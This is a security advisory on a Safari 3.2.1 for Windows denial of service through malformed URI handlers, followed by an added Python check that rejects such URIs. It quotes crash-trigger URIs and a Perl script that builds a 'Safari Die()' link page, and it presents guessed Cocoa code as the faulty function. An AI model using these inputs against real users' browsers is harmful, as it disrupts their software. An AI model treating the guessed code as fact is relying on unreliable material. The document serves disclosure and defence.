##############################################
Safari 3.2.1 for Windows SafariURL protocol handler abuse (NULL dereference)
Vendor: http://www.apple.com
Original advisory: http://lostmon.blogspot.com/2009/01/safari-321-for-windows-safariurl.html
Vendor notified: YES
Exploit available: Private
##############################################

This article is a "second" part of:
http://lostmon.blogspot.com/2009/01/safari-for-windows-321-remote-http-uri.html

Safari for Windows is vulnerable to a NULL pointer dereference in its http, ftp and SafariURL protocol handlers. The issue is triggered when a user clicks a specially crafted link with a malformed URI, which causes a NULL pointer dereference in Safari and results in a loss of availability for the browser.

The SafariURL case is very curious: we can compose a malformed URL like SafariURL://http://../ or ftp://../ and, when we try to open it with Safari, Safari opens a new window. When we try to close this new window by clicking the 'X', the window is closed, but it reopens again...

So why does it reopen in an infinite loop? Take a look at the possible source code of the function: before using the pointer, the code nowhere checks that it is not equal to NULL.

######################
Part of code affected
######################

// The function header is not part of the advisory's excerpt; the name is assumed.
static NSBundle *locateSafariBundle(void)
{
    CFURLRef safariURL = nil;
    OSStatus err = LSFindApplicationForInfo(kLSUnknownCreator, CFSTR("com.apple.Safari"), nil, nil, &safariURL);
    if (err != noErr)
        displayErrorAndQuit(@"Unable to locate Safari",
                            @"Nightly builds of WebKit require Safari to run. Please check that it is available and then try again.");

    // safariURL is dereferenced here; the error code above is the only guard, there is no explicit NULL check.
    NSBundle *safariBundle = [NSBundle bundleWithPath:[(NSURL *)safariURL path]];
    CFRelease(safariURL);
    return safariBundle;
}

###############################
Simple PoC
###############################

#!/usr/bin/perl
# Safari_httpDoSPoc.pl
# Safari for Windows 3.2.1 Remote http: uri handler DoS
# Lostmon [Lostmon@gmail.com]
# [http://lostmon.blogspot.com]
use strict;
use warnings;

# The output file name is the first argument.
my $archivo = $ARGV[0];
if (!defined($archivo)) {
    print "Uso: $0 <fichero.html>\n";
    exit 1;
}

# The HTML tags of the generated page were lost in this copy of the advisory and
# are reconstructed minimally here; PLACEHOLDER_URI_1..4 mark where the original
# link targets (the malformed URIs) went, since those values were not preserved.
my $cabecera = "<html><head><title>Safari 3.2.1 for windows Browser Die PoC By Lostmon</title></head><body>\n";

my $codigo = <<'HTML';
<p>Safari 3.2.1 for windows Browser Die PoC By Lostmon<br>
( lostmon@gmail.com) http://lostmon.blogspot.com</p>
<p>This PoC is a malformed http, safariurl and ftp URI; this causes Safari for Windows
to turn unstable and unresponsive.</p>
<p>Click THIS link =&gt; <a href="PLACEHOLDER_URI_1">Safari Die()</a> or this other =&gt; <a href="PLACEHOLDER_URI_2">Safari Die()</a></p>
<p>=&gt; <a href="PLACEHOLDER_URI_3">Safari Die()</a> or this other =&gt; <a href="PLACEHOLDER_URI_4">Safari Die()</a></p>
HTML

my $piepag = "</body></html>\n";
my $datos  = $cabecera . $codigo . $piepag;

# Write the page to the requested file.
open(my $fh, '>', $archivo) or die "Cannot open $archivo: $!";
print $fh $datos;
close($fh);
exit 0;

############################################

I don't know if it has remote code execution or other effects; I made SEVERAL tests and could only cause a DoS. I don't know if we can change NSBundle...

Thanks to Estrella for being my light.
Thanks to all the Lostmon Team.

--
Sincerely: Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....
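As an added, defender-side example that is not part of the advisory or of Apple's code: a Python check that rejects URIs of the two malformed shapes the advisory describes (a second scheme where the authority should be, as in SafariURL://http://../, or a dot-segment authority, as in ftp://../) before a registered protocol handler ever sees them. The set of handled schemes and the sample URIs are assumptions taken from the advisory's text.

```python
import re

# Schemes the advisory names as having handlers in Safari 3.2.1 (assumption).
HANDLED_SCHEMES = {"http", "ftp", "safariurl"}

SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")
NESTED_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*)://")


def check_handler_uri(uri):
    """Return (ok, reason) for a URI about to be handed to a protocol handler.

    Rejects the two malformed shapes the advisory describes:
      * a second scheme where the authority should be (SafariURL://http://../)
      * an empty or dot-segment authority (ftp://../)
    """
    m = SCHEME_RE.match(uri)
    if not m:
        return False, "no scheme"
    scheme = m.group(1).lower()
    if scheme not in HANDLED_SCHEMES:
        return False, "scheme %r not handled" % scheme
    rest = uri[m.end():]
    if rest.startswith("//"):
        rest = rest[2:]
    # A "scheme://" right after the first "scheme://" is the nested form.
    nested = NESTED_SCHEME_RE.match(rest)
    if nested:
        return False, "nested scheme %r in authority" % nested.group(1).lower()
    # The authority is everything up to the first "/"; "host:port" is fine,
    # but "", "." and ".." are not a host at all.
    authority = rest.split("/", 1)[0]
    if authority in ("", ".", ".."):
        return False, "empty or dot-segment authority %r" % authority
    return True, "ok"


# Constructed sample inputs: the two malformed URIs quoted in the advisory and
# a well-formed one for comparison.
SAMPLES = ["SafariURL://http://../", "ftp://../", "http://www.apple.com/"]

if __name__ == "__main__":
    for u in SAMPLES:
        ok, why = check_handler_uri(u)
        print("%-24s %s (%s)" % (u, "ACCEPT" if ok else "REJECT", why))
```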